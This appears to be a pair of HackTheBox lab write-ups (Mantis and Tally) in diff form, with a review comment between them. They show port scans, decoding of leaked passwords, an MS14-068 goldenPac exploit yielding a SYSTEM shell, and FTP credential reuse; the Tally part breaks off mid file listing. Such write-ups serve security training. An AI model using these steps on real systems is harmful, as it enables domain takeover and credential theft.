+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → nmap -sCV 10.10.10.52
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 17:06 BST
+ Nmap scan report for 10.10.10.52
+ Host is up (0.57s latency).
+ Not shown: 984 closed ports
+ PORT STATE SERVICE VERSION
+ 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-25 14:10:56Z)
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
+ 445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
+ 464/tcp open kpasswd5?
+ 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+ 636/tcp open tcpwrapped
+ 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
+ 3269/tcp open tcpwrapped
+ 49152/tcp open msrpc Microsoft Windows RPC
+ 49153/tcp open msrpc Microsoft Windows RPC
+ 49154/tcp open msrpc Microsoft Windows RPC
+ 49155/tcp open msrpc Microsoft Windows RPC
+ 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+ 49158/tcp open msrpc Microsoft Windows RPC
+ Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: -36m00s, deviation: 2h18m34s, median: -1h56m01s
+ | smb-os-discovery:
+ | OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
+ | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
+ | Computer name: mantis
+ | NetBIOS computer name: MANTIS\x00
+ | Domain name: htb.local
+ | Forest name: htb.local
+ | FQDN: mantis.htb.local
+ |_ System time: 2020-08-25T10:11:51-04:00
+ | smb-security-mode:
+ | account_used: <****blank>
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: required
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled and required
+ | smb2-time:
+ | date: 2020-08-25T14:11:53
+ |_ start_date: 2020-08-25T14:10:13
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 191.16 seconds
+
+## **Part 2 : Getting User Access**
+
+This box is one example of a machine that has alot of ports opened, and yet these are not enough. you need to enumerate every port on this machine using nmap's -p- flag:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
+ → nmap -p- 10.10.10.52
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-02 19:57 GMT
+ Nmap scan report for 10.10.10.52
+ Host is up (0.037s latency).
+ Not shown: 65509 closed ports
+ PORT STATE SERVICE
+ 53/tcp open domain
+ 88/tcp open kerberos-sec
+ 135/tcp open msrpc
+ 139/tcp open netbios-ssn
+ 389/tcp open ldap
+ 445/tcp open microsoft-ds
+ 464/tcp open kpasswd5
+ 593/tcp open http-rpc-epmap
+ 636/tcp open ldapssl
+ **1337/tcp open waste**
+ 1433/tcp open ms-sql-s
+ 3268/tcp open globalcatLDAP
+ 3269/tcp open globalcatLDAPssl
+ 5722/tcp open msdfsr
+ 8080/tcp open http-proxy
+ 9389/tcp open adws
+ 49152/tcp open unknown
+ 49153/tcp open unknown
+ 49154/tcp open unknown
+ 49155/tcp open unknown
+ 49157/tcp open unknown
+ 49158/tcp open unknown
+ 49172/tcp open unknown
+ 50255/tcp open unknown
+ 57110/tcp open unknown
+ 57114/tcp open unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 32.05 seconds
+
+
+And here you see the port that we missed earlier: 1337:
+
+
+
+So let's enumerate it with gobuster and a wordlist from seclists:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
+ → sudo apt install seclists gobuster -y
+
+ [ 10.10.14.7/23 ] [ /dev/pts/6 ] [~]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.52:1337/
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/01/02 20:09:19 Starting gobuster
+ ===============================================================
+ /secure_notes (Status: 301)
+ Progress: 145379 / 220561 (65.91%)^C
+ [!] Keyboard interrupt detected, terminating.
+ ===============================================================
+ 2021/01/02 20:18:25 Finished
+ ===============================================================
+
+
+And here we found the /secure_notes directory:
+
+
+
+Let's see what's in dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
+ → curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
+ 1. Download OrchardCMS
+ 2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
+ 3. Launch IIS and add new website and point to Orchard CMS folder location.
+ 4. Launch browser and navigate to http://localhost:8080
+ 5. Set admin password and configure sQL server connection string.
+ 6. Add blog pages with admin user.
+
+ Credentials stored in secure format
+ OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
+ SQL Server sa credentials file namez%
+
+
+Now here we have a bit to talk about, first of all the string of text in the note name:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
+ → echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
+ 6d2424716c5f53405f504073735730726421
+
+
+
+
+And here we get a hex string (0-9-a-f) so let's convert it back to ascii:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
+ → echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
+ m$$ql_S@_P@ssW0rd!
+
+
+
+And here we have a sql password!
+
+And that binary string gives us the following password: @dm!n_P@ssW0rd!
+
+
+ @dm!n_P@ssW0rd!
+ m$$ql_S@_P@ssW0rd!
+
+
+
+The next part of this box is on port 8080 which is a blog:
+
+
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
+ → curl 10.10.10.52:8080 2>/dev/null | grep Powered
+
+
+ Powered by [Orchard](http://www.orchardproject.net) (C) The Theme Machine 2021.
+
+
+
+
+Let's try to find the administrator page of this Orchard website using gobuster:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.52:8080
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.52:8080
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/01/02 20:47:55 Starting gobuster
+ ===============================================================
+ /archive (Status: 200)
+ /blogs (Status: 200)
+ **/admin (Status: 302)**
+ /tags (Status: 200)
+ /Archive (Status: 200)
+ /pollArchive (Status: 200)
+ /Blogs (Status: 200)
+ /newsarchive (Status: 200)
+ /news_archive (Status: 200)
+
+
+
+Let's investigate the /admin page with the credentials (admin:@dm!n_P@ssW0rd!) we found earlier:
+
+
+
+And we're logged in as admin!
+
+
+
+However this is kind of a rabbithole, therefore you see why this can be a hard box, The next step is to poke around port 1433
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
+ → sudo apt install dbeaver -y
+
+
+
+`    
+
+And here we have found the user james' credentials:
+
+
+ james@htb.local
+ J@m3s_P@ssW0rd!
+
+
+
+## **Part 3 : Getting Root Access**
+
+Now in order to gain root access on the box we're going to use psexec:
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
+ → locate goldenPac.py
+ /usr/share/doc/python3-impacket/examples/goldenPac.py
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
+ → cd /usr/share/doc/python3-impacket/examples/
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [doc/python3-impacket/examples]
+ → python3 goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
+ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
+
+ Password:
+ [*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
+
+
+
+Once you have pasted in jame's password, wait a bit for impacket to do it's magic, and you will get root shell on the box :
+
+
+ [ 10.10.14.7/23 ] [ /dev/pts/9 ] [doc/python3-impacket/examples]
+ → python3 goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
+ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
+
+ Password:
+ [*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
+
+ [-] Couldn't get forest info ([Errno Connection error (htb.local:445)] timed out), continuing
+ [*] Attacking domain controller 10.10.10.52
+ [*] 10.10.10.52 found vulnerable!
+ [*] Requesting shares on 10.10.10.52.....
+ [*] Found writable share ADMIN$
+ [*] Uploading file cviDLGQS.exe
+ [*] Opening SVCManager on 10.10.10.52.....
+ [*] Creating service dqDR on 10.10.10.52.....
+ [*] Starting service dqDR.....
+ [!] Press help for extra shell commands
+ Microsoft Windows [Version 6.1.7601]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>
+ C:\Windows\system32>whoami
+ nt authority\system
+
+
+
+From here type both flags:
+
+
+ C:\Windows\system32>type C:\Users\james\Desktop\user.txt
+ 8aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+ C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
+ 20XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there you have it!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
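Review bot: Part 3 says "we're going to use psexec", but the tool actually run is impacket's goldenPac.py, which is the MS14-068 Kerberos PAC-forgery exploit (the `[*] 10.10.10.52 found vulnerable!` line is its vulnerability check); the psexec-style service creation is only the delivery step after the forged ticket is obtained. The sentence should name MS14-068, since that is what explains why a plain domain user (james) lands as `nt authority\system` on a 2008 R2 domain controller. The port-1433 section is missing its substance: after `sudo apt install dbeaver -y` the text jumps straight to james' credentials with no connection parameters, database or query shown, so state at least which login was used (the dev notes point at `sa` with `m$$ql_S@_P@ssW0rd!` and the `orcharddb` database) and the SELECT against the Orchard users table that returned `J@m3s_P@ssW0rd!`. Likewise "that binary string gives us the following password" shows no decoding; a one-liner such as `echo 0100000001100100... | perl -lpe '$_=pack "B*",$_'` makes the step reproducible. Minor: the lone backtick line after the dbeaver install is leftover from a dropped image, `<****blank>` in the nmap output is bold-escaping debris for `<blank>`, and "alot", "jame's password" and "do it's magic" are typos.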
diff --git a/Hard/6.md b/Hard/6.md
new file mode 100644
index 0000000..956f02f
--- /dev/null
+++ b/Hard/6.md
@@ -0,0 +1,797 @@
+# Tally Writeup
+
+
+
+## Introduction :
+
+Tally is a hard windows box released back in November 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
+ → sudo nmap -vvv -sTU -p- 10.10.10.59 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 139/tcp on 10.10.10.59
+ Discovered open port 135/tcp on 10.10.10.59
+ Discovered open port 21/tcp on 10.10.10.59
+ Discovered open port 80/tcp on 10.10.10.59
+ Discovered open port 445/tcp on 10.10.10.59
+ Discovered open port 47001/tcp on 10.10.10.59
+ Discovered open port 49665/tcp on 10.10.10.59
+ Discovered open port 32846/tcp on 10.10.10.59
+ Discovered open port 32844/tcp on 10.10.10.59
+ Discovered open port 49666/tcp on 10.10.10.59
+ Discovered open port 49669/tcp on 10.10.10.59
+ Discovered open port 32843/tcp on 10.10.10.59
+ Discovered open port 15567/tcp on 10.10.10.59
+ Discovered open port 81/tcp on 10.10.10.59
+ Discovered open port 49670/tcp on 10.10.10.59
+ Discovered open port 5985/tcp on 10.10.10.59
+ Discovered open port 1433/tcp on 10.10.10.59
+ Discovered open port 49668/tcp on 10.10.10.59
+ Discovered open port 808/tcp on 10.10.10.59
+ Discovered open port 49667/tcp on 10.10.10.59
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/7 ] [~/_HTB/Kotarak]
+ → nmap -sCV -p21,80,81,135,139,445,808,1443 10.10.10.59
+ Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 18:12 CET
+ Nmap scan report for 10.10.10.59
+ Host is up (0.037s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-generator: Microsoft SharePoint
+ | http-ntlm-info:
+ | Target_Name: TALLY
+ | NetBIOS_Domain_Name: TALLY
+ | NetBIOS_Computer_Name: TALLY
+ | DNS_Domain_Name: TALLY
+ | DNS_Computer_Name: TALLY
+ |_ Product_Version: 10.0.14393
+ |_http-server-header: Microsoft-IIS/10.0
+ 81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-server-header: Microsoft-HTTPAPI/2.0
+ |_http-title: Bad Request
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
+ 808/tcp open ccproxy-http?
+ 1443/tcp closed ies-lm
+ Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: -1s, deviation: 0s, median: -1s
+ | ms-sql-info:
+ | 10.10.10.59:1433:
+ | Version:
+ | name: Microsoft SQL Server 2016 RTM
+ | number: 13.00.1601.00
+ | Product: Microsoft SQL Server 2016
+ | Service pack level: RTM
+ | Post-SP patches applied: false
+ |_ TCP port: 1433
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2020-12-22T17:12:21
+ |_ start_date: 2020-12-22T17:08:42
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 46.79 seconds
+
+
+## **Part 2 : Getting User Access**
+
+nmap found port 80 so let's run gobuster on it:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
+ → echo '10.10.10.59 tally.htb' >> /etc/hosts
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u http://tally.htb/
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://tally.htb/
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/12/22 18:18:15 Starting gobuster
+ ===============================================================
+ /_app_bin (Status: 301)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/wt/forms/common.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/3082: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_admin: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_admin/operations.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/1033: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/50: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/wp/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/_catalogs/masterpage/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:29 [!] Get http://tally.htb/60: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ [ERROR] 2020/12/22 18:18:30 [!] Get http://tally.htb/_catalogs/lt/forms/allitems.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
+ /_layouts (Status: 301)
+ /_controltemplates (Status: 301)
+ /_layouts/1033 (Status: 301)
+ /_layouts/1033/avreport.htm (Status: 200)
+ /_layouts/1033/filedlg.htm (Status: 200)
+ /_layouts/1033/fontdlg.htm (Status: 200)
+ /_layouts/1033/error.htm (Status: 200)
+ /_layouts/1033/images (Status: 301)
+ /_layouts/1033/iframe.htm (Status: 200)
+ /_layouts/1033/instable.htm (Status: 200)
+ /_layouts/1033/menu.htc (Status: 200)
+ /_layouts/1033/menubar.htc (Status: 200)
+ /_layouts/1033/selcolor.htm (Status: 200)
+ /_layouts/1033/spthemes.xml (Status: 200)
+ /_layouts/1033/spthemes.xsd (Status: 200)
+ /_layouts/accessdenied.aspx (Status: 302)
+ /_layouts/addfieldfromtemplate.aspx (Status: 302)
+ /_layouts/aclinv.aspx (Status: 302)
+ /_layouts/addrole.aspx (Status: 302)
+ /_layouts/addcontenttypetolist.aspx (Status: 302)
+ /_layouts/addwrkfl.aspx (Status: 302)
+ /_layouts/adminrecyclebin.aspx (Status: 302)
+ /_layouts/approve.aspx (Status: 302)
+ /_layouts/advsetng.aspx (Status: 302)
+ /_layouts/aspxform.aspx (Status: 302)
+ /_layouts/addnavigationlinkdialog.aspx (Status: 200)
+ /_layouts/addfiletype.aspx (Status: 200)
+ /_layouts/areacachesettings.aspx (Status: 200)
+ /_layouts/areanavigationsettings.aspx (Status: 200)
+ /_layouts/addcontentsource.aspx (Status: 200)
+ /_layouts/areatemplatesettings.aspx (Status: 200)
+ /_layouts/areawelcomepage.aspx (Status: 200)
+ /_layouts/associatedgroups.aspx (Status: 302)
+ /_layouts/assocwrkfl.aspx (Status: 302)
+ /_layouts/addservernamemappings.aspx (Status: 200)
+ /_layouts/assetedithyperlink.aspx (Status: 200)
+ /_layouts/assetportalbrowser.aspx (Status: 200)
+ /_layouts/audience_defruleedit.aspx (Status: 200)
+ /_layouts/audience_edit.aspx (Status: 200)
+ /_layouts/audience_main.aspx (Status: 200)
+ /_layouts/audience_sched.aspx (Status: 200)
+ /_layouts/assetuploader.aspx (Status: 200)
+ /_layouts/audience_memberlist.aspx (Status: 200)
+ /_layouts/audience_list.aspx (Status: 200)
+ /_layouts/assetimagepicker.aspx (Status: 200)
+ /_layouts/backlinks.aspx (Status: 302)
+ /_layouts/avreport.aspx (Status: 302)
+ /_layouts/authenticate.aspx (Status: 302)
+ /_layouts/bdcadminui/addbdcapplication.aspx (Status: 200)
+ /_layouts/bdcadminui/bdcapplications.aspx (Status: 200)
+ /_layouts/auditsettings.aspx (Status: 200)
+ /_layouts/barcodeimagefromitem.aspx (Status: 200)
+ /_layouts/bdcadminui/bdcentities.aspx (Status: 200)
+ /_layouts/bdcadminui/editbdcaction.aspx (Status: 200)
+ /_layouts/audience_view.aspx (Status: 200)
+ /_layouts/bdcadminui/addbdcaction.aspx (Status: 200)
+
+
+Basically out of this garbage you had to find _layouts/15/viewlsts.aspx
+
+
+
+Into Documents there's a file called "ftp-details"
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
+ → mv ~/Downloads/ftp-details.docx .
+ mv: cannot stat '/home/nothing/Downloads/ftp-details.docx': No such file or directory
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
+ → ls -lash ftp-details.docx
+ 12K -rw-r--r-- 1 nothing nothing 11K Dec 22 18:23 ftp-details.docx
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Tally]
+ → file ftp-details.docx
+ ftp-details.docx: Zip archive data, at least v1.0 to extract
+
+ [ 10.10.14.6/23 ] [ /dev/pts/3 ] [~/_HTB/Tally]
+ → lowriter ftp-details.docx
+
+
+` 
+
+So we can add that domain name to our hosts file:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/6 ] [~/_HTB/Tally]
+ → sudo vim /etc/hosts
+
+ 10.10.10.59 tally.htb tally.htb.local
+
+
+And on Site Pages you're supposed to get a file called "FinanceTeam"
+
+ 
+
+So here we're hinted towards a ftp_user account for the "intranet folder", so we could have credentials from what we gathered so far : **ftp_user:UTDRSCH53c"$6hys**. And obviously we're going to try to login via ftp since our nmap scan picked up port 21:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/8 ] [~]
+ → ftp 10.10.10.59
+ Connected to 10.10.10.59.
+ 220 Microsoft FTP Service
+ Name (10.10.10.59:nothing): ftp_user
+ 331 Password required
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-31-17 10:51PM <****DIR> From-Custodian
+ 10-01-17 10:37PM <****DIR> Intranet
+ 08-28-17 05:56PM <****DIR> Logs
+ 09-15-17 08:30PM <****DIR> To-Upload
+ 09-17-17 08:27PM <****DIR> User
+ 226 Transfer complete.
+ ftp> exit
+ 221 Goodbye.
+
+And here we get a few directories so let's just use wget to get what they contain recursively:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/8 ] [_HTB/Tally/ftp]
+ → wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@tally.htb.local'
+ --2020-12-22 23:06:07-- ftp://ftp_user:*password*@tally.htb.local/
+ => ‘tally.htb.local/.listing’
+ Resolving tally.htb.local (tally.htb.local)... 10.10.10.59
+ Connecting to tally.htb.local (tally.htb.local)|10.10.10.59|:21... connected.
+ Logging in as ftp_user ... Logged in!
+ ==> SYST ... done. ==> PWD ... done.
+ ==> TYPE I ... done. ==> CWD not needed.
+ ==> PASV ... done. ==> LIST ... done.
+
+ tally.htb.local/.listing [ <=> ] 244 --.-KB/s in 0s
+
+ ==> PASV ... done. ==> LIST ... done.
+
+ [...]
+
+
+And now let's go through what we're downloading:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [_HTB/Tally/ftp]
+ → du -hs tally.htb.local
+ 99M tally.htb.local
+
+ [ 10.10.14.6/23 ] [ /dev/pts/9 ] [_HTB/Tally/ftp]
+ → tree tally.htb.local
+ tally.htb.local
+ ├── From-Custodian
+ │ ├── RED-528103410.log
+ │ ├── RED-528113411.log
+ │ ├── RED-528123412.log
+ │ ├── RED-528133413.log
+ │ ├── RED-5281341.log
+ │ ├── RED-528143414.log
+ │ ├── RED-528153415.log
+ │ ├── RED-528163416.log
+ │ ├── RED-528173417.log
+ │ ├── RED-528183418.log
+ │ ├── RED-528193419.log
+ │ ├── RED-528203420.log
+ │ ├── RED-528213421.log
+ │ ├── RED-528223422.log
+ │ ├── RED-528233423.log
+ │ ├── RED-5282342.log
+ │ ├── RED-528243424.log
+ │ ├── RED-528253425.log
+ │ ├── RED-528263426.log
+ │ ├── RED-528273427.log
+ │ ├── RED-528283428.log
+ │ ├── RED-528293429.log
+ │ ├── RED-528303430.log
+ │ ├── RED-528313431.log
+ │ ├── RED-528323432.log
+ │ ├── RED-528333433.log
+ │ ├── RED-5283343.log
+ │ ├── RED-528343434.log
+ │ ├── RED-528353435.log
+ │ ├── RED-528363436.log
+ │ ├── RED-528373437.log
+ │ ├── RED-528383438.log
+ │ ├── RED-528393439.log
+ │ ├── RED-528403440.log
+ │ ├── RED-528413441.log
+ │ ├── RED-528423442.log
+ │ ├── RED-528433443.log
+ │ ├── RED-5284344.log
+ │ ├── RED-528443444.log
+ │ ├── RED-528453445.log
+ │ ├── RED-528463446.log
+ │ ├── RED-528473447.log
+ │ ├── RED-528483448.log
+ │ ├── RED-528493449.log
+ │ ├── RED-528503450.log
+ │ ├── RED-5285345.log
+ │ ├── RED-5286346.log
+ │ ├── RED-5287347.log
+ │ ├── RED-5288348.log
+ │ └── RED-5289349.log
+ ├── Intranet
+ │ └── Binaries
+ │ └── Firefox Setup 44.0.2.exe
+ ├── Logs
+ │ ├── ftp_connect_8235771490510.txt
+ │ ├── ftp_connect_8235771490511.txt
+ │ ├── ftp_connect_8235771490512.txt
+ │ ├── ftp_connect_8235771490513.txt
+ │ ├── ftp_connect_8235771490514.txt
+ │ ├── ftp_connect_8235771490515.txt
+ │ ├── ftp_connect_8235771490516.txt
+ │ ├── ftp_connect_8235771490517.txt
+ │ ├── ftp_connect_8235771490518.txt
+ │ ├── ftp_connect_8235771490519.txt
+ │ ├── ftp_connect_823577149051.txt
+ │ ├── ftp_connect_8235771490520.txt
+ │ ├── ftp_connect_8235771490521.txt
+ │ ├── ftp_connect_8235771490522.txt
+ │ ├── ftp_connect_8235771490523.txt
+ │ ├── ftp_connect_8235771490524.txt
+ │ ├── ftp_connect_8235771490525.txt
+ │ ├── ftp_connect_8235771490526.txt
+ │ ├── ftp_connect_8235771490527.txt
+ │ ├── ftp_connect_8235771490528.txt
+ │ ├── ftp_connect_8235771490529.txt
+ │ ├── ftp_connect_823577149052.txt
+ │ ├── ftp_connect_8235771490530.txt
+ │ ├── ftp_connect_8235771490531.txt
+ │ ├── ftp_connect_8235771490532.txt
+ │ ├── ftp_connect_8235771490533.txt
+ │ ├── ftp_connect_8235771490534.txt
+ │ ├── ftp_connect_8235771490535.txt
+ │ ├── ftp_connect_8235771490536.txt
+ │ ├── ftp_connect_8235771490537.txt
+ │ ├── ftp_connect_8235771490538.txt
+ │ ├── ftp_connect_8235771490539.txt
+ │ ├── ftp_connect_823577149053.txt
+ │ ├── ftp_connect_8235771490540.txt
+ │ ├── ftp_connect_8235771490541.txt
+ │ ├── ftp_connect_8235771490542.txt
+ │ ├── ftp_connect_8235771490543.txt
+ │ ├── ftp_connect_8235771490544.txt
+ │ ├── ftp_connect_8235771490545.txt
+ │ ├── ftp_connect_8235771490546.txt
+ │ ├── ftp_connect_8235771490547.txt
+ │ ├── ftp_connect_8235771490548.txt
+ │ ├── ftp_connect_8235771490549.txt
+ │ ├── ftp_connect_823577149054.txt
+ │ ├── ftp_connect_8235771490550.txt
+ │ ├── ftp_connect_823577149055.txt
+ │ ├── ftp_connect_823577149056.txt
+ │ ├── ftp_connect_823577149057.txt
+ │ ├── ftp_connect_823577149058.txt
+ │ └── ftp_connect_823577149059.txt
+ ├── To-Upload
+ │ ├── employees-id_number.xlsx
+ │ └── Invoices.zip
+ └── User
+ ├── Administrator
+ │ └── New folder
+ ├── Ekta
+ │ ├── OFSI_quick_guide_flyer.pdf
+ │ └── PSAIS_1_April_2017.pdf
+ ├── Jess
+ │ └── actu8-espreadsheet-designer-datasheet.pdf
+ ├── Paul
+ │ ├── financial-list-guide.pdf
+ │ ├── financial_sanctions_guidance_august_2017.pdf
+ │ ├── Monetary_penalties_for_breaches_of_financial_sanctions.pdf
+ │ └── New folder
+ ├── Rahul
+ │ └── Mockups-Backup
+ ├── Sarah
+ │ ├── MBSASetup-x64-EN.msi
+ │ ├── notes.txt
+ │ └── Windows-KB890830-x64-V5.52.exe
+ ├── Stuart
+ │ ├── customers - Copy.csv
+ │ └── Unit4-Connect-Financials-Agenda.pdf
+ ├── Tim
+ │ ├── Files
+ │ │ ├── bonus.txt
+ │ │ ├── KeePass-2.36
+ │ │ │ ├── KeePass.chm
+ │ │ │ ├── KeePass.exe
+ │ │ │ ├── KeePass.exe.config
+ │ │ │ ├── KeePassLibC32.dll
+ │ │ │ ├── KeePassLibC64.dll
+ │ │ │ ├── KeePass.XmlSerializers.dll
+ │ │ │ ├── License.txt
+ │ │ │ ├── Plugins
+ │ │ │ ├── ShInstUtil.exe
+ │ │ │ └── XSL
+ │ │ │ ├── KDBX_Common.xsl
+ │ │ │ ├── KDBX_DetailsFull_HTML.xsl
+ │ │ │ ├── KDBX_DetailsLight_HTML.xsl
+ │ │ │ ├── KDBX_PasswordsOnly_TXT.xsl
+ │ │ │ └── KDBX_Tabular_HTML.xsl
+ │ │ └── tim.kdbx
+ │ └── Project
+ │ ├── Communications
+ │ ├── Log
+ │ │ └── do to.txt
+ │ └── Vendors
